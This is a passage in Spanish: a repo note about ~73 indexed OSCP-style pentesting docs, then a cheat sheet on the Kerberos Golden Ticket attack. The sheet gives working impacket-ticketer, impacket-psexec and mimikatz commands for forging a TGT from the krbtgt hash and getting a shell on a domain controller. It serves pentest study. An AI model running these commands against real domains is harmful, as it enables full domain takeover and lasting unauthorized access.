El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
816 B
816 B
Golden Ticket
Con el hash de krbtgt forjas tu propio TGT → eres cualquiera (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.
Requisito
Hash NTLM de la cuenta krbtgt → se obtiene con DCSync o secretsdump sobre el DC.
Forjar
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass corp.local/Administrator@dc.corp.local
# mimikatz equivalente:
kerberos::golden /user:Administrator /domain:corp.local /sid:S-... /krbtgt:HASH /ptt
Concepto
krbtgt firma todos los TGT (Kerberos). Si controlas su hash, firmas tickets válidos a voluntad → persistencia total.
Relacionado: Silver Ticket · DCSync · Pass-the-Hash · OSCP MOC